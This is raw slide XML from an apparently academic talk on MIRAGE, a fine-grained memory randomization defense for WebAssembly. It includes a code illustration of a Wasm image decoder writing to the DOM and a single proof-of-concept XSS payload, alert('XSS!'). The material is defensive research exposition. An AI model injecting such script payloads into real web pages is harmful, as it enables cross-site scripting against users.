                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{574B9547-1E9A-084A-CD0F-8C78F26D4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2733540" y="6168668"/>
              <a:ext cx="683879" cy="718975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="190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5CAF0A5C-3CFD-AC87-7453-B91CEC26030C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-3634086" y="6398967"/>
              <a:ext cx="953102" cy="510261"/>
              <a:chOff x="3065317" y="4864318"/>
              <a:chExt cx="1124845" cy="611691"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="96" name="Rechteck 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B514568-1D01-9047-599B-5BF0DCC0F496}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3065317" y="4879148"/>
                <a:ext cx="1124845" cy="5968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7" name="Grafik 96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D5AC0CF1-0A9F-A042-0FBC-718BE3E8DA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351028" y="4864318"/>
                <a:ext cx="605407" cy="590272"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="98" name="Grafik 97" descr="Ein Bild, das Säugetier, Katze, Hauskatze, Kleine bis mittelgroße Katzen enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1C9A2E3-AB01-4F76-230A-15648F710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-2930328" y="4859775"/>
              <a:ext cx="858511" cy="5726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9" name="Grafik 7" descr="Ein Bild, das Säugetier, Katze, Hauskatze, Kleine bis mittelgroße Katzen enthält.&#10;&#10;Automatisch generierte Beschreibung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{775147C9-31D6-29B8-BE9D-F339D4DC8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-2784433" y="5910063"/>
              <a:ext cx="771113" cy="5031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B723C9A2-D45F-AAFD-D776-C3C970C7C752}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-2775289" y="5414235"/>
              <a:ext cx="953102" cy="510261"/>
              <a:chOff x="3065317" y="4864318"/>
              <a:chExt cx="1124845" cy="611691"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:scene3d>
              <a:camera prst="perspectiveHeroicExtremeRightFacing"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="102" name="Rechteck 101">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0295ABA-4274-59AD-8928-1F8F2E19D6AC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3065317" y="4879148"/>
                <a:ext cx="1124845" cy="596861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:sp3d contourW="12700">
                <a:contourClr>
                  <a:srgbClr val="7C60C6"/>
                </a:contourClr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3" name="Grafik 102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728126AB-F8BB-5C13-2AF0-31A4D2F2B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351028" y="4864318"/>
                <a:ext cx="605407" cy="590272"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:sp3d contourW="12700">
                <a:contourClr>
                  <a:srgbClr val="7C60C6"/>
                </a:contourClr>
              </a:sp3d>
            </p:spPr>
          </p:pic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D58608C2-2EFA-F51A-1674-FC5E50911EC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-3586790" y="5424547"/>
              <a:ext cx="953102" cy="510261"/>
              <a:chOff x="3065317" y="4864318"/>
              <a:chExt cx="1124845" cy="611691"/>
            </a:xfrm>
            <a:scene3d>
              <a:camera prst="perspectiveHeroicExtremeRightFacing"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="105" name="Rechteck 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09A3B1F4-50FC-F45B-6C88-012FACF7B1D5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3065317" y="4879148"/>
                <a:ext cx="1124845" cy="596861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:sp3d contourW="12700">
                <a:contourClr>
                  <a:srgbClr val="7C60C6"/>
                </a:contourClr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Grafik 105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DDB48EF9-5641-6C2B-DB48-5398CA11F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351028" y="4864318"/>
                <a:ext cx="605407" cy="590272"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:sp3d contourW="12700">
                <a:contourClr>
                  <a:srgbClr val="7C60C6"/>
                </a:contourClr>
              </a:sp3d>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="107" name="Grafik 106" descr="Ein Bild, das Säugetier, Katze, Hauskatze, Kleine bis mittelgroße Katzen enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F207A8D-A2AA-2BBD-C3B1-3DB0F8F59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19023317">
              <a:off x="-3782934" y="4795684"/>
              <a:ext cx="763580" cy="6438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12657E1E-22C8-3E07-4064-E25278396E97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-3586790" y="5918236"/>
              <a:ext cx="953102" cy="510261"/>
              <a:chOff x="3065317" y="4864318"/>
              <a:chExt cx="1124845" cy="611691"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:scene3d>
              <a:camera prst="perspectiveHeroicExtremeRightFacing"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="130" name="Rechteck 129">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53F2B86B-90A1-5973-A455-4397B88781D2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3065317" y="4879148"/>
                <a:ext cx="1124845" cy="596861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:sp3d contourW="12700">
                <a:contourClr>
                  <a:srgbClr val="7C60C6"/>
                </a:contourClr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1" name="Grafik 130" descr="Ein Bild, das Cartoon, Clipart, Kreativität enthält.&#10;&#10;Automatisch generierte Beschreibung">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9E63757-2DA3-93FC-E34E-F5F0759AC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351028" y="4864318"/>
                <a:ext cx="605407" cy="590272"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:sp3d contourW="12700">
                <a:contourClr>
                  <a:srgbClr val="7C60C6"/>
                </a:contourClr>
              </a:sp3d>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Pfeil: nach oben gebogen 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA543D7C-F1DC-BD38-009B-85AA446464BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1490917" y="5018657"/>
            <a:ext cx="520060" cy="1442777"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 31425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" name="Grafik 50" descr="Sperren mit einfarbiger Füllung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{061F78F2-3609-BC07-FC29-2F9DA15A6B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88469" y="1162159"/>
            <a:ext cx="1872043" cy="18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16745 -0.0004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DA43D-F71E-93D9-3A27-F4279F989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4578A2C-2761-4CCA-FE4E-BD971083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856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/>
              <a:t>How do we turn exploitation into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>game of chance?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38E8F7B-0CB6-A8ED-8C2E-A12932650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539722"/>
            <a:ext cx="10515600" cy="2592721"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0"/>
              <a:t>MIRAGE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="1" dirty="0"/>
              <a:t>Fine-Grained Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="1" dirty="0"/>
              <a:t>Randomization for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="1" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="50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293400-0F11-CDE1-A840-DE31406A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F34A7B-3775-A8DE-AF8D-6D2CBB6E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451" y="6492874"/>
            <a:ext cx="5195099" cy="228601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing the Next-Generation Web: A Holistic Approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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5B29A1-A4B3-7891-91D8-CEEDE280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8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8DD696-0C44-BB27-E048-5DEDA14C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52F1C-7D6B-60F9-7429-DB750A437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C93C1-1A70-0AA1-5625-93363D75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22</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p: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4B502250-BF5B-D349-6D25-0B11101F88A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7726619" y="136525"/>
            <a:ext cx="2809315" cy="2823073"/>
            <a:chOff x="7726619" y="136525"/>
            <a:chExt cx="2809315" cy="282307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D86A1183-5275-FA2B-A518-3111F685D761}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7726619" y="136525"/>
              <a:ext cx="2809315" cy="2823073"/>
              <a:chOff x="4955710" y="2291509"/>
              <a:chExt cx="2809315" cy="3512916"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Rechteck: abgerundete Ecken 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011DBFFE-9D88-90BD-BDF1-10458A094F55}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5250069" y="2382615"/>
                <a:ext cx="2514956" cy="3421810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uppieren 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E19213F-A608-5386-51D1-ED406750D7D4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5456710" y="2584683"/>
                <a:ext cx="2083246" cy="3145558"/>
                <a:chOff x="9257603" y="606346"/>
                <a:chExt cx="2506222" cy="2883773"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="20" name="Rechteck: abgerundete Ecken 46">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A012DF80-B272-E856-53EC-CEC6CE7FBA97}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9257603" y="606346"/>
                  <a:ext cx="2506222" cy="288377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Textfeld 47">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB717FBA-55FA-846C-EB94-10F375D528B1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9719326" y="645659"/>
                  <a:ext cx="1512154" cy="4232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>
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>Memory</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="Grafik 56" descr="Ein Bild, das Electric Blue (Farbe), Grafiken, Mond, Kreis enthält.&#10;&#10;Automatisch generierte Beschreibung">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3591F3A3-3A6B-1195-0BEE-7B04DFDB0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955710" y="2291509"/>
                <a:ext cx="781478" cy="781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13" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E3EA71-A8F5-B0AA-0623-9C46A38FFEF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8557441" y="861930"/>
              <a:ext cx="1584000" cy="439419"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EED1A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tag</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B077962F-3FB2-B858-47BD-E653424FD188}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8557441" y="1874012"/>
              <a:ext cx="1584000" cy="862940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC6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err="1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image</a:t>
              </a:r>
              <a:endParaRPr sz="140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15" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB03B26-3249-430A-93A8-C39382592A9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8557441" y="1301350"/>
              <a:ext cx="1584000" cy="573804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...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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FBB6380-7B8A-E5F9-74DF-B2AB74FBDFF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318654" y="3142672"/>
            <a:ext cx="1155469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545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{843A1191-D632-8C8A-72BD-BBAB6D75BEAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8555256" y="1320798"/>
            <a:ext cx="1611194" cy="1443773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6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6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6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  <a:endParaRPr sz="1600" dirty="0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" name="Google Shape;550;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9FF5B88-01C7-4E1E-1057-C0A7DECC303D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8555256" y="871764"/>
            <a:ext cx="1611194" cy="442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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert(„XSS!“)</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRP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FB7474E-EC6F-2EFC-0783-BA900E0DADC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="21929" y="-99114"/>
            <a:ext cx="5487559" cy="2595437"/>
            <a:chOff x="21929" y="-99114"/>
            <a:chExt cx="5487559" cy="2595437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096B680F-FBD8-7739-E5E0-E2604F3D6869}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371460" y="592091"/>
              <a:ext cx="5138028" cy="190423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de-DE" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>string</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t> 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tag = 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"&lt;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img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 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src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='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data:image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/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png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;"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1600" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>void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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="DCDCAA"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>decodeImage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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="4EC9B0"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>ImageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="569CD6"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="8BC2E1"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>image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) {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="1425"/>
                </a:lnSpc>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="6A9955"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  //...</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p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  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="9CDCFE"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="DCDCAA"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>writeToDom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(tag, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>img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);</a:t>
              </a:r>
            </a:p>
            <a:p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}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p: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06C0FB5D-6FC7-D21B-A5F0-736C8C8F8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1929" y="-99114"/>
              <a:ext cx="1162750" cy="1075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A4C15CD-07E6-1D6C-4362-6960545D3023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="718787" y="3408802"/>
            <a:ext cx="3508438" cy="1904818"/>
            <a:chOff x="1476513" y="3940319"/>
            <a:chExt cx="2044495" cy="1038861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002DA17-9628-30E3-6AE8-938F59AF5AB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2078231" y="4593109"/>
              <a:ext cx="1442777" cy="38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/>
                <a:t>MIRAGE</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="3600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Grafik 35" descr="Zahnräder mit einfarbiger Füllung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B0D9E1-ECB7-1EB7-4DFD-E23CCB1923E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6513" y="3940319"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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F3A65DF0-1DB4-9C78-2649-6B6F718840C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4408898" y="3442196"/>
            <a:ext cx="2809315" cy="2823073"/>
            <a:chOff x="2800027" y="3442196"/>
            <a:chExt cx="2809315" cy="2823073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9AFB6A5B-2247-F8D2-21F0-A4CC9385D24F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2800027" y="3442196"/>
              <a:ext cx="2809315" cy="2823073"/>
              <a:chOff x="4955710" y="2291509"/>
              <a:chExt cx="2809315" cy="3512916"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rechteck: abgerundete Ecken 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91371740-A011-6087-DA4E-7BA25307E730}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5250069" y="2382615"/>
                <a:ext cx="2514956" cy="3421810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uppieren 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C382AA24-F0B8-3737-ECF3-8ADBFCD0E2F9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5456710" y="2584683"/>
                <a:ext cx="2083246" cy="3145558"/>
                <a:chOff x="9257603" y="606346"/>
                <a:chExt cx="2506222" cy="2883773"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42" name="Rechteck: abgerundete Ecken 46">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{015ACFD2-842D-244E-9CFF-09A9D7EB7387}"/>
                    </a:ext>
                  </a:extLst>
